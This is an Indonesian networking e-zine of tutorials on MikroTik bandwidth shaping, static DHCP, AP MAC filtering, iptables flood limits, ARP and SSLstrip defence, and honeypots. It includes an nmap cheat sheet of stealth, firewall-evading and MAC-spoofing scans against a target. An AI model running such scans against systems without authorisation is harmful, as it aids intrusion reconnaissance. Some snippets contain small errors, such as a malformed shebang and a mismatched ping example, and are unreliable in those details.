ini kisah cerita waktu tahun 2009 :maybe: pada kebingungan pas waktu di suruh bos buka warnet + game online dengan 1 line isp..... akhirnya nemu juga cara setingnya.... nah sekarang langsung aja ah….. Test running well di RB450 OS ver.4.5 ISP= Astinet TALIKOM 1Mbps Mangle: GAME contoh buat Point Blank, game lain sesuaikan aja port/ip nya karna ane cuma sediakan Point Blank aja di warnet :)
Code:
chain=game action=mark-connection new-connection-mark=Game passthrough=yes protocol=tcp dst-address=203.89.146.0/23 dst-port=39190 comment=”Point Blank”
Code:
chain=game action=mark-connection new-connection-mark=Game passthrough=yes protocol=udp dst-address=203.89.146.0/23 dst-port=40000-40010
Code:
chain=game action=mark-packet new-packet-mark=Game_pkt passthrough=no connection-mark=Game
Code:
chain=prerouting action=jump jump-target=game
POKER - paling banyak main bahkan game FB terlaris di kota ane untuk saat itu
Code:
chain=forward action=mark-connection new-connection-mark=Poker_con passthrough=yes protocol=tcp dst-address-list=LOAD POKER comment=”POKER”
Code:
chain=forward action=mark-connection new-connection-mark=Poker_con passthrough=yes protocol=tcp content=statics.poker.static.zynga.com
Code:
chain=forward action=mark-packet new-packet-mark=Poker passthrough=no connection-mark=Poker_con
35. e-ZIT #Vol 2 - Networking 35
Queue Tree
Code:
name=”Main Browse” parent=Lan limit-at=0 priority=8 max-limit=1M burst- limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Browse” parent=Main Browse packet-mark=http_pkt limit-at=0 queue=Http priority=8 max-limit=1M burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Game” parent=global-total packet-mark=Game_pkt limit-at=0 queue=Game priority=1 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Poker” parent=global-out packet-mark=Poker limit-at=0 queue=Game priority=3 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Download” parent=global-out packet-mark=Download_pkt limit-at=0 queue=Download priority=8 max-limit=256k burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Main Upload” parent=global-in limit-at=0 priority=8 max-limit=256k burst-limit=0 burst-threshold=0 burst-time=0s
Code:
name=”Upload” parent=Main Upload packet-mark=Upload limit-at=0 queue=Upload priority=8 max-limit=0 burst-limit=0 burst-threshold=0 burst-time=0s
HASILNYA BROWSING 1Mbs > bagi rata 1 warnet DOWNLOAD 256Kbps > bagi rata 1 warnet GAME > seadanya bandwith sesuai kebutuhan 1 warnet POKER > seadanya bandwith sesuai kebutuhan 1 warnet UPLOAD > seadanya bandwith bagi rata sesuai kebutuhan 1 warnet mungkin setingan ini belum sempurna.... buat kk ama om yg lain mungkin bisa kasih pencerahan ato tambahan
./regards
shockw4f3
36. e-ZIT #Vol 2 - Networking 36
Mikrotik > Leases Static DHCP
Kebetulan ne cara mau dipake buat keperluan sendiri. Berhubung Hotspot di kantor pake DHCP, trus HP yang connect juga sering dipake buat experiment di LAN, tapi karena IP LAN nya DHCP jadinya server di HP jadi berubah-ubah. Dan karena tidak ada opsi untuk setting IP di HP, jadi solusinya adalah meminjamkan IP dari DHCP secara statik dari mikrotik. Yarp, langsung ke command nya ja...
Code:
[admin@MikroTik] > /ip dhcp-server lease add address=1.2.3.4 mac- address=aa:bb:cc:dd:ee:ff server=dhcp_pool_name disabled=no
Simple aja sih, untuk parameternya tinggal menyesuaikan device masing-masing yang akan di set. Kalo Static DHCP nya banyak, biar gak bingung, masing-masing rules diatas tambahkan parameter "comment". Ah, kayaknya udah pada tauk :D Semoga bermanfaat ja buat yang belum tau. ^_^ Source: http://forum.mikrotik.com/viewtopic.php?f=13&t=42587
./regards
JMozac
37. e-ZIT #Vol 2 - Networking 37
Network Scanning With NMAP
Halooooooo Heuheu,
Yup ketemu lagi sama Bifi,
pada thread sebelummnya kan kaka shockw4v3, udah bagi-bagi tips tentang command- command ping kan, itu lho command atau apalah, bawaan hampir semua OS untuk mengecek komunikasi antar komputer dalam sebuah jaringan melalui protocol TCP/IP,,,
Nah seperti gambar di atas, Kali ini Bifi mau share tentang tips network scanning with Nmap, atau bahasa torang dong bilang scan jaringan pake Nmap, nah apa itu Nmap ??? Ini dia penjelasannya :
"Nmap (“Network Mapper”) merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya" di kutip dari situs resmi NMAP...
nah, untuk para networker, pasti udah nggak asing lagi dengan tools yang 1 ini.. Ok,
kebanyakan penjelasan nih,
langsung aja ah,....
Open Terminal Truz Coba Aja Satu-Satu
kayak gambar dibawah ini
38. e-ZIT #Vol 2 - Networking 38
Neh, Command-Commandnya
Code:
nmap -n -sn [ip target] < Multi ip address dan subnet nmap --packet-trace [ip target] < Menampilkan paket diterima dan dikirim nmap --iflist < Menampilkan semua interface dan rute nmap 192.168.2.0/24 --exclude [IP] < Excluding hosts/networks nmap -A [ip target] < Scan OS Dan Layanan (service target) nmap -O [ip target] < remote operating system nmap -sP [ip target] < Mendeteksi layanan dan device yang sedang up nmap -sV [ip target] < Mendeteksi versi dari layanan (service) nmap -sA [ip target] < Mendeteksi firewall
Code:
nmap -sN [ip target] < Scanning firewall | TCP Null Scan untuk menipu firewall untuk memberikan respon ,dalam kondisi TCP flag header adalah nol (null) nmap -sF [ip target] < Scanning firewall | TCP Fin scan untuk mengecek firewall ,hanya TCP FIN bit nmap -sX [ip target] < Scanning firewall | Penggunaan TCP Xmas & setting FIN, PSH, dan URG
Code:
nmap -f [site target] < Firewall untuk packets fragments nmap -PN [site target] < Melakukan scanning disaat target menggunakan firewall nmap -F [ip target] < Fast Scann nmap --reason [ip target] < Opsi Reason nmap --open [ip target] < Menampilkan hanya port yang terbuka nmap -T5 [ip target] < Scanning terhadap subnet
39. e-ZIT #Vol 2 - Networking 39
Code:
nmap -p 80 [ip target] < Melakukan scann terhadap port tertentu .. dalam hal ini port 80 nmap -p T:80 [ip target] < Melakukan scann terhadap port tertentu dengan protokol tcp nmap -p U:53 [ip target] < Melakukan scann terhadap port tertentu dengan protokol udp
Code:
nmap -p "*" [ip target] < Scann seluruh port dengan opsi "*" nmap --top-ports 3 [IP] < top ports nmap -sO [ip target] < IP protocol PING nmap -PS [ip target] < TCP ACK (PA) and TCP Syn (PS) ping nmap -PA [ip target] < Untuk penggunaan TCP Syn
Code:
nmap -sS [ip target] < TCP SYN Scan | Penggunaan Stealthy scan [-sS] nmap -sT [ip target] < TCP SYN Scan | TCP connect scan (warning: no stealth scan) [-sT] nmap -sA [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports menggunakan TCP ACK scan [-sA] nmap -sW [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports menggunakan TCP Window scan [-sW] nmap -sM [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports menggunakan TCP Maimon scan
Code:
nmap -PO [ip target] < IP protocol ping nmap -sU [ip target] < UDP services (UDP scan) nmap -PU [ip target] < UDP ping | Melakukan scanning terhadap ip, khusus mencari port UDP nmap -PU 2000.2001 [ip target] < UDP ping | Melakukan scanning port UDP yang telah di tentukan
Code:
nmap --spoof-mac [mac address palsu kita] [ip target] < MAC address spoofing nmap --spoof-mac 0 [IP HOST] < Jika anda hendak menggunakan mac address spoofing secara random (acak)
Mungkin itu saja sedikit command-command NMAP dari saya,,, silahkan di coba ... eheheheheh
./regards
Bifi
40. e-ZIT #Vol 2 - Networking 40
Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G
yup yup...i'm back....sesuai dengan judulnya, kali ini qt akan membangun security mac filtering... sedikit penjelasan :
Wireless Access Point (WAP) adalah perangkat keras yang memungkinkan perangkat wireless lain (seperti laptop, ponsel) untuk terhubung ke jaringan kabel menggunakan Wi-fi, bluetooh atau perangkat standar lainnya.
Access Point berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan banyak Client dapat saling terhubung melalui jaringan. Sebagai Hub/Switch yang bertindak untuk menghubungkan jaringan lokal dengan jaringan wireless/nirkabel, Access point dapat memancarkan atau mengirim koneksi data / internet melalui gelombang radio, ukuran kekuatan sinyal juga mempengaruhi area coverage yang akan dijangkau, semakin besar kekuatan sinyal (ukurannya dalam satuan dBm atau mW) semakin luas jangkauannya.
Media Acces Control (MAC) adalah identitas sebuah perangkat jaringan yg direprensentasikan dalam bentuk hardware-address atau physical address untuk setiap node yg terhubung dalam sebuah jaringan
sedikit lagi penjelasan yak...yang sabar yak, kata pepatah, orang sabar selalu berada disamping pagar
Quote:MAC filter fungsinya untuk menseleksi komputer mana yang boleh masuk kedalam jaringan berdasarkan MAC Address. Bila tidak terdaftar, tidak akan bisa masuk ke jaringan. MAC filter Address akan membatasi user dalam mengakses jaringan wireless. Alamat MAC dari perangkat komputer user akan didaftarkan terlebih dahulu agar bisa terkoneksi dengan jaringan wireless,
ok langsung kita masuk k intinya...persiapan :
1. Laptop/PC juga boleh
2. Kabel LAN (minimal 1 meter) lebih juga boleh
3. Access Point (kali ini ane menggunakan TP-LINk TLWA610G)
4. yang paling penting adalah rokok coy
tahap :
1. colok kabel LAN ke AP lalu ujung yg satunya lagi colok ke LAN card laptop
2. buka browser, ketik pada address bar ketik 192.168.1.1 lalu tekan enter. qt akan diminta memasukan username dan password. default username dan password pada acces point adalah username : admin password : admin.... lalu tekan enter...
41. e-ZIT #Vol 2 - Networking 41
3. setelah masuk ke tampilan awal, lalu click network, seperti d bawah ini :
o Type : ada dua pilihan, yaitu static IP dan Dinamic IP (DHCP). pilih sesuai kebutuhan. kali ini ane make Static IP (ipnya qt input manual)
o IP Addres, defaultnya tadi 192.168.1.1, bisa diganti, terserah teman-teman sekalian mau diganti degan berapa, kali ini qt ganti dengan 192.168.1.111 (IP kelas C)
o Subnet mask, qt masukan 255.255.255.0
o Gateway : qr masukan 192.168.1.250, gateway tergantung settingan d tempat teman2....
o Click Save
42. e-ZIT #Vol 2 - Networking 42
4. setelah itu click wireless lalu click basic settings, seperti dibawah ini :
o SSID : Terserah mau dinamakan apa
o Region/regional : ane masukan Indonesia..cinta negeri sendiri coy (nyari aman :-P)
o Channel : terserah teman2 sekalian,defaultnya 6..
o Mode : defaultnya 54Mbps (802.11g), make default juga boleh
o click save lagi coy
5. selanjutnya click Mac Filtering, lalu click Enable, untuk mengaktifkan mac filteringnya, lalu click Deny
43. e-ZIT #Vol 2 - Networking 43
6. lanjut coy, click DHCP, lalu click DHCP setting, kegunaan dari DHCP adalah agar client mendapat IP secara otomatis, biar nggak nambah kerjaan qt untuk setting manual d lepi/kompi client...
o click enable pada DHCP SERVER
o Start IP Address : ane masukan 192.168.1.100, tpi tergantung teman2 mau start IP-nya mulai dari berapa
o End IP address : ane masukan 192.168.1.199
o Address Least Time dibiarin default aja
o Default Gateway : qt masukan sama dengan yg qt masukan pada point 3 tadi yaitu 192.168.1.250
o Primary DNS : masukan primary DNS-nya
o Secondary DNS : alternatif DNS (cadangan)
o click save lagi coy
7. Selanjutnya qt ganti username and password AP : Click System Tools --> Password....
seperti dibawah ini
44. e-ZIT #Vol 2 - Networking 44
o Old user name : defaultnya admin
o Old Passwrod : defaultnya admin
o New User Name : masukan username yg baru
o New Password : Masukan Password yg baru
o Confirm New Password : masukan lagi password yg baru
o lalu click save, jgn lupa reboot AP
8. selesai AP direboot, ketik 192.168.1.111 pada address bar browser, masukan username and password yg baru qt ganti tadi.....hihihih
9. Untuk menambahkan pengguna baru, click Wireless --> Mac Filtering --> Add New..SS-nya d bawah ini:
45. e-ZIT #Vol 2 - Networking 45
lalu qt dihadapkan pada tampilan berikut :
o MAC ADDRESS : masukan mac address calon pengguna
o Description : namai pengguna baru, misal JIN lalu click save
yup...akhirnya selesai juga...hihihhii
Quote: settingan berbeda-beda, tergantung dari jenis AP-nya
./regards
Mavis Vermilion
46. e-ZIT #Vol 2 - Networking 46
Security > Mencegah Serangan Ping Flooding Dengan Iptables
heuheu Salam Backtrackers
jumpa lagi nih ye,,
ok langsung saja, sesuai judulnya kali ini Bifi mau share cara Mencegah Serangan Ping
Flooding Dengan Iptables,,,, nah apa itu iptables,,,
ne penjelasannya :
iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita.
dan ping flooding : Software ini hanya dijalankan di Windows dan menggunakan System PING dan ICMP Protocol yang memungkinkan pengiriman paket dengan cepat. Korban dari ping flood ini antara lain modem, windows, Linux, router, dan server. Semua sistem operasi dan mesin dijaringan komputer yang memiliki IP address bisa diserang tanpa terkecuali. Efek dari ping flood ini, yaitu aktifitas komputer korban yang meningkat serta traffic jaringan komputer penuh.
nah udah jelas apa belum...?? ok udah ngerti kan. langsung aja yah...
#Lets Rock
buka editor kaka, terus ketikan kalimat-kalimat cinta di bawah ini...
1. Mencegah paket Syn Flood Attack
Buat sebuah file bernama closesyn.sh atau apalah terserah kaka, yang isinya sebagai berikut untuk mencegah serangan syn flood
Code:
#!bin/sh #Menghapus semua Rule iptables -F iptables -X iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT #blok paket syn yang dicurigai jahat iptables -N synjahat iptables -A INPUT -p tcp --syn -j synjahat iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT iptables -A synjahat -j DROP
trus jalankan scriptnya, kayak gini zbyte@bt:~# sh closesyn.sh
47. e-ZIT #Vol 2 - Networking 47
2. Mencegah Ping Flood attack Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood
Code:
#!bin/sh #Menghapus semua Rule iptables -F iptables -X iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT #blok paket ping(icmp) yang dicurigai jahat iptables -N pingjahat iptables -A INPUT -p icmp -j pingjahat iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT iptables -A pingjahat -j DROP
jalankan scriptnya, contoh zbyte@bt:~#sh closeping.sh keterangan syntax iptables yang Zbyt3 pake -F (–flush) = Mengosongkan aturan pada sebuah chain -X (–delete-chain) = Menghapus rantai yang disebutkan -N (–new-chain) = Membuat rantai baru -P (–policy) = Membuat kebijakan default pada sebuah rantai -p (–protocol) = Mengecek tipe protokol tertentu. Tanda inverse(!) berarti kecuali. Misalnya protocol ! tcp berarti kecuali tcp -A (–append) = Menambah aturan pada akhir rantai sehingga akan dieksekusi terakhir -m (multiport –source-port) = Mendefinisikan port atau port range lebih dari satu -j (–jump) = Perlakuan yang diberikan terhadap paket-paket yang memenuhi kriteria. Setelah perintah ini ada beberapa opsi yaitu: ACCEPT: akan mengijinkan paket DROP: akan menolak paket REJECT: akan menolak paket nah untuk lebih jelasnya tentang iptables kunjungi : https://help.ubuntu.com/community/IptablesHowTo or http://andreslinuxer.wordpress.com/2010/...-iptables/ mungkin itu saja yang bisa Bifi share malam ini.... pegel ni tangan... sekian dan terima kasih....
./regards
Bifi
48. e-ZIT #Vol 2 - Networking 48
Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip
Oke Langsung Saja…
1. Pencegahan ARP, DNS/DHCP Spoofing
Mengubah ARP komputer kita dari dinamyc ke static caranya : * Untuk Windows :
masuk ke menu "Run" ketik "cmd" setelah muncul layarhitam (konsole ) ketik "getmac" untuk melihat MACADDRES Dan "ipconfig" untuk melihat ip addres komputer anda Misalnya: MACADDRES yang anda punya"18:f4:6a:75:3e:cd" dan Ip addres anda 192.168.88.7. langakah selanjutnya Mengubah ARP Anda menjadi static..
Perintahnya : "arp -s [Ip_Addres ] [MAC_Anda]"
Jadi seperti ini: "Arp -s 192.168.88.7 18:f4:6a:75:3e:cd"
* Untuk Linux :
Buka konsole (terminal) ketik "macchanger -s wlan0" untuk menampilkan MACADDRES yang anda miliki,ingat..!! "sesuaikan device wireless yang anda gunakan" kalau saya "wlan0" Misalnya :MACADDRES anda "07:f4:6a:71:3e:ce" . Langkah selanjutnya Mengubah ARP anda Menjadi Static
Perintahnya:"arp -i wlan0 -s 192.168.88.7 07:f4:6a:75:3e:ce"
2. Pencegahan SSLstrip
Serangan MITM dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif. misalnya twitterl,ymail,facebook,paypal dll
49. e-ZIT #Vol 2 - Networking 49
Melakukan Ping terhadap website yang anda ingin kunjungi
contoh :
root@assock:~#ping http://www.twitter.com
PING 10.0.18.76 (10.0.18.76) 56(84) bytes of data.
64 bytes from 10.0.18.76: icmp_seq=1 ttl=64 time=0.063 ms
64 bytes from 10.0.18.76: icmp_seq=2 ttl=64 time=0.051 ms
64 bytes from 10.0.18.76: icmp_seq=3 ttl=64 time=0.050 ms
64 bytes from 10.0.18.76: icmp_seq=4 ttl=64 time=0.047 ms
64 bytes from 10.0.18.76: icmp_seq=5 ttl=64 time=0.053 ms
64 bytes from 10.0.18.76: icmp_seq=6 ttl=64 time=0.050 ms
hasil ping di atas menunjukan bahwa DNS anda telah di alihkan ke Ip 10.0.18.76 yang bukan Real addres Facebook
ok mungkin bisa membantu agar teman-2 tidak menjadi korban...!!!
./regards
shockw4f3
50. e-ZIT #Vol 2 - Networking 50
Security > Apa Itu Honeypot ?
Honeypot ? apa itu ? apa fungsinya ? kenapa tiba-tiba nongol di e-ZIT ?
Yosh, e-ZIT menulis Thread ini berdasarkan request dari teman-teman ZIT Divisi Networking, nah berikut ini sedikit penjelasan mengenai “Apa Itu Honeypot”
Sejarah
Ada beberapa definisi honeypot yang disampaikan oleh beberapa peneliti honeypot pada makalah sistem kemanan yang mereka buat maupun dari halaman web. Menurut Lance Spitzner, seorang arsitek sistem keamanan Sun Microsystems, ”A honeypot is security resource whose value lies in being probed, attacked, or compromised.” Definisi ini menjadi acuan beberapa makalah lainnya. Dari definisi itu dapat diambil kesimpulan bahwa honeypot baru dikatakan suatu sistem keamanan jika honeypot tersebut disusupi, diserang, atau dikendalikan oleh penyerang. Ada juga seorang insinyur berkebangsaan Swiss bernama Reto Baumann menyikapi interpretasi yang diberikan oleh Lance Spitzner. Menurut Baumann melalui tugas akhir diplomanya, ” A honeypot is a resource which pretends to be a real target. A honeypot is expected to be attacked or compromised. The main goals are the distraction of an attacker and the gain of information about an attack and the attacker.Jadi menurut Baumann, honeypot adalah sebuah sumber daya sistem keamanan yang dibuat sebagai tujuan utama penyerang yang sebenarnya merupakan sistem yang palsu untuk menjebak penyerang. Sistem honeypot biasanya hanya sebuah sistem yang dihubungkan dengan jaringan produktif, atau sistem yang asli, yang ada dengan tujuan untuk menjebak penyerang.
Konsep serupa honeypot (sebelumnya belum diberi istilah seperti itu) dipercaya sudah cukup lama ada, walaupun tidak ada literatur yang membahasnya sebelum tahun 1990. Tahun 1990 Clifford Stoll menerbitkan buku The Cuckoo’s Egg, yang lebih mirip cerita detektif. Penerbitnya Pocket Books, yang lebih dikenal dengan novel. Inilah penerbitan pertama yang menguraikan konsep honeypot. Buku ini menceritakan kejadian sesungguhnya selama periode sepuluh bulan di tahun 1986-1987. Stoll adalah astronom pada Lawrence Berkeley Lab yang menjadi admin berbagai komputer untuk komunitas astronom. Selisih akuntansi senilai 75 sen membuatnya menyadari akan adanya hacker bernama Hunter, yang telah menyusup ke dalam sistem.
Bukannya menutup account penyusup ini, Stoll malah membiarkannya berada dalam sistem, agar dapat mempelajarinya lebih jauh dan memburunya. Tanpa disadari penyerang, Stoll menyiapkan direktori SDINET (Strategic Defence Initiave Network) dan mengisinya dengan file-file yang pura-pura berisi berbagai file keuangan dan rahasia negara. Hacker ini ternyata tidak tertarik pada file-file keuangan. Makalah teknis pertama mengenai honeypot terbit
51. e-ZIT #Vol 2 - Networking 51
pada tahun 1990 itu juga, tulisan Bill Cheswick berjudul ‘An Eve-ning with Berfeld in Which a Cracker Is Lured, Endured and Studied’ . Berbeda dengan yang pertama, Cheswick memang menyiapkan suatu sistem yang memang untuk diserang, menjadikannya kasus pertama dari honeypot yang sesungguhnya. Pada makalah ini Cheswick bukan saja membahas cara membangun dan menggunakan honeypot, melainkan juga menceritakan bagaimana seorang hacker Belanda dipelajari sewaktu dia menyerang dan menguasai sistem. Cheswick pertama-tama membangun suatu sistem dengan beberapa kelemahan (termasuk Sendmail) untuk mendapatkan ancaman apa saja yang ada dan bagaimana cara kerjanya. Tujuannya bukanlah untuk menangkap orang tertentu, melainkan untuk mempelajari kegiatan membahayakan apa saja yang bisa terjadi terhadap network dan sistemnya. Cheswick menciptakan suatu lingkungan terkontrol yang disebutnya sebagai jail (ia tidak menyebutnya sebagai honeypot), yang mengurung kegiatan sang penyerang. Hacker Belanda dengan nickname Berfeld ini memasuki sistem dengan memanfaatkan kelemahan pada Sendmail sampai mendapatkan kendali terhadap sistem. Secara umum, honeypot dapat didefinisikan sebagai sebuah sumber daya sistem informasi dimana nilai guna dari sumber daya tersebut justru berdasar kepada terdeteksinya kasus penggunaan yang tidak terotorisasi atau tidak diperbolehkan secara hukum dari sumber daya tersebut. Atau dengan kata lain, honeypot adalah sebuah sumber daya yang bersifat seakan-akan target yang sebenarnya, yang dengan sengaja disediakan untuk diserang atau diambil alih. Oleh karena itu, honeypot akan diamati, diserang bahkan dieksploitasi oleh penyerang atau penyusup. Tujuan utama dari honeypot ini adalah untuk mengumpulkan informasi dari suatu serangan dan penyerang yang melakukannya. Intruder atau penyerang merupakan istilah umum yang diberikan untuk menggambarkan seseorang yang berusaha untuk masuk ke dalam sistem dalam arti berusaha menggunakan sistem dimana mereka tidak memiliki autorisasi atau menggunakan sistem untuk maksud yang menyimpang di luar hak-hak yang mereka miliki.
Tipe Honeypot
Honeypot dibagi menjadi dua tipe dasar, yaitu production honeypot dan research honeypot. Tujuan utama dari production honeypot adalah untuk membantu mengurangi resiko keamanan jaringan pada sebuah organisasi. Production honeypot memberikan suatu nilai tambah bagi keamanan jaringan dari suatu organisasi. Tipe kedua, research honeypot, adalah honeypot yang didesain untuk mendapatkan informasi mengenai aktivitas-aktivitas dari komunitas penyerang atau penyusup. Research honeypot tidak memberikan suatu nilai tambah secara langsung kepada suatu organisasi, melainkan digunakan sebagai alat untuk meneliti ancaman-ancaman keamanan yang mungkin dihadapi dan bagaimana cara untuk melindungi diri dari ancaman tersebut.
52. e-ZIT #Vol 2 - Networking 52
Klasifikasi Honeypot
Honeypot dapat diklasifikasikan berdasarkan pada tingkat interaksi yang dimilikinya. Tingkat interaksi dapat didefinisikan sebagai tingkat aktivitas penyerang atau intruder di dalam sistem yang diperbolehkan maka semakin tinggi pula tingkat interaksi honeypot.
LOW INTERACTION HONEYPOT
Low-interaction honeypot merupakan honeypot dengan tingkat interaksi honeypot, yaitu honeypot yang didesain untuk mengemulasikan service (layanan) seperti pada server yang asli. Penyerang hanya mampu memeriksa dan terkoneksi ke satu atau beberapa port.
Kelebihan low-interaction honeypot yaitu:
Mudah di install, dikonfigurasi, deployed, dan dimaintain
Mampu mengemulasi suatu layanan seperti http, ftp, telnet, dsb.
Difungsikan untuk deteksi serangan, khususnya pada proses scanning atau percobaanpembukaan koneksi pada suatu layanan.
Kekurangan low-interaction honeypot :
Layanan yang di berikan hanya berupa emulasi, sehingga penyerang tidak dapat berinteraksi secara penuh dengan layanan yang diberikan atau sistem operasinya secara langsung
Informasi yang bisa kita dapatkan dari penyerang sangat minim.
Apabila serangan dilakukan oleh “real person” bukan “automated tools” mungkin akan segera menyadari bahwa yang sedang dihadapi merupakan mesin honeypot, karena keterbatasan layanan yang bisa diakses.
MEDIUM INTERACTION HONEYPOT
Kelebihannya Medium Interaction Honeypot:
Memiliki kemampuan yang lebih banyak untuk berinteraksi dengan penyerang dibandingkan low-interaction honeypot namun tidak sebanyak high-interaction honeypot.
Emulasi layanan dapat ditambahkan berbagai macam fitur tambahan sehingga seakanakan penyerang benar-benar sedang berinteraksi dengan layanan yang sebenarnya.
Contoh: script untuk mengemulasikan IIS web server dengan berbagai macam informasi tambahan yang menyertai web server tersebut sehingga benar-benar terlihat seperti aslinya, atau pun juga membuat emulasi IIS yang dapat berinteraksi
53. e-ZIT #Vol 2 - Networking 53
dengan suatu jenis worm, sehingga kita bisa mendapatkan payload dari worm tersebut untuk dianalisis selanjutnya.
Contoh: menggunakan jail atau chroot, yaitu membangun sistem operasi virtual pada partisi yang terpisah didalam sistem operasi yang sebenarnya dimana sistem operasi virtual tersebut sepenuhnya di kontrol oleh sistem operasi yang sebenarnya, cara ini dapat memberikan suasana sistem operasi yang sesungguhnya bagi penyerang.
Kekurangan Medium Interaction Honeypot :
Sistem tersebut cukup kompleks.
Memerlukan usaha lebih untuk maintain dan deploy sistem tersebut sehingga akses yang diberikan kepada penyerang benar-benar terjamin tingkat keamanannya namun tetap dapat memberikan suasana sistem yang nyata bagi penyerang sehingga penyerang tersebut tidak curiga bahwa aktivitasnya sedang di monitor.
HIGH INTERACTION HONEYPOT
Pada high-interaction honeypot terdapat sistem operasi dimana penyerang dapat berinteraksi langsung dan tidak ada batasan yang membatasi interaksi tersebut. Menghilangkan batasan-batasan tersebut menyebabkan tingkat risiko yang dihadapi semakin tinggi karena penyerang dapat memiliki akses root. Pada saat yang sama, kemungkinan pengumpulan informasi semakin meningkat dikarenakan kemungkinan serangan yang tinggi. Dikarenakan penyerang dapat berinteraksi secara penuh dengan sistem operasi, maka apabila si penyerang telah mendapat akses root.
Kelebihannya :
Penyerang berinteraksi langsung dengan sistem yang nyata termasuk diantaranya sistem operasi, network, hingga layanan yang diberikan ( web, ssh service, mail service, dll )
Umumnya dibangun suatu sistem khusus dengan topologi yang telah dipersiapkan.
Sistem tersebut biasanya terdiri dari berbagai macam implementasi dari teknologi keamanan yang banyak digunakan untuk melindungi suatu sistem, seperti firewall, IDS/IPS, router, dll.
Target serangan berupa sistem operasi sebenarnya yang siap untuk berinteraksi secara langsung dengan penyerang.
Kekurangannya :
Perencanaan dan implementasi sistem jauh lebih rumit dan dibutuhkan banyak pertimbangan.
54. e-ZIT #Vol 2 - Networking 54
High-interaction honeypot bersifat tidak efisien karena membutuhkan pengawasan berkala.
Apabila telah diambil alih oleh penyerang maka honeypot tersebut dapat menjadi ancaman bagi jaringan yang ada.
SEJARAH WIRELESS HONEYPOT
Kemajuan teknologi honeypot mulai terlihat ketika Kevin Poulsen pada tahun 2002 mempublikasikan penelitiannya, Wi-Fi Honeypots a New Hacker Trap , penelitian Poulsen ini dianggap beberapa pihak sebagai teknologi wireless honeypot yang pertama. Suatu tim peneliti, WISE ( Wireless Information Security Experiment ) pada tahun 2002 didirikan oleh SAIC ( Science Applications International Corporation ) di Washington DC, Amerika Serikat. Tim peneliti ini meneliti celah keamanan jaringan wireless pada waktu itu, tim tersebut mendapati bahwa kebanyakan jaringan wireless pada saat itu sangat mudah untuk disusupi dan sangat terbuka. Jenis ancaman yang ditemukan adalah akses yang tidak terotorisasi, penggunaan jaringan wireless yang ilegal, mendengarkan proses komunikasi pada wireless secara ilegal ( eavesdropping ). Ancaman kemanan tersebut merupakan ancaman keamanan yang paling utama dan paling sering terjadi saat ini. Pada akhir 2002, sebuah organisasi bernama Tenebris mempublikasikan hasil penelitian mereka, yaitu pengumpulan data dari wireless honeypot yang mereka implementasikan di Ottawa ( Canada ) dan menyimpulkan bahwa sangat banyak terjadi aktivitas war driving saat itu dan apa saja yang sering menjadi target serangan para penyerang di jaringan wireless. Selanjutnya, Tenebris melanjutkan riset mereka di sekitar kota London lalu menuju Adelaide, South Australia.
SKENARIO SERANGAN PADA JARINGAN WIRELESS
Dari beberapa penelitian sebelumnya, ada suatu bentuk pola skenario serangan yang umum terjadi pada sistem keamanan wireless. Setidaknya ada tiga pola skenario serangan, yaitu:
Serangan yang sebenarnya ditujukan ke jaringan kabel ( LAN ) dengan memakai jaringan wireless sebagai media untuk menyusup ke LAN.
Serangan yang langsung ditujukan kepada pengguna jaringan wireless. Jenis serangan ini menyerang perangkat wireless user.
Serangan yang ditujukan ke infrastruktur jaringan wireless secara keseluruhan. Jenis serangan ini biasanya bertujuan mengambil alih akses penuh jaringan wireless.
ARSITEKTUR WIRELESS HONEYPOT
Secara umum arsitektur wireless honeypot yang akan diimplementasikan adalah sebagai berikut.
Wireless Access Point ( WAP ) sebagai media prasarana jaringan wireless.
55. e-ZIT #Vol 2 - Networking 55
Wireless Client ( WC ) merupakan pihak pengguna jaringan wireless ( user ).
Wireless Monitor ( WMON ) sebagai perangkat yang merekam trafik jaringan.
Wireless Data Analysis ( WDA ) berfungsi menganalisis trafik dari WMON
Wired Instructure ( WI ) merupakan infrastruktur LAN.
Saya informasikan kepada pembaca, jika anda membeli perangkat telekomunikasi, sebaiknya yang sudah di sertifikasi atau yang sudah bersertifikat resmi dari postel, untuk menjaga agar anda tidak berurusan dengan pihak yang berwajib. Dan perangkat yang sudah di sertifikasi tentunya sudah lulus pengujian di balai uji, sehingga mutu dan kualitasnya terjamin.
Penempatan Honeypot
Eksternal Placement, honeypot diposisikan berhadapan langsung dengan internet, jadi tidak ada firewall di depan honeypot.
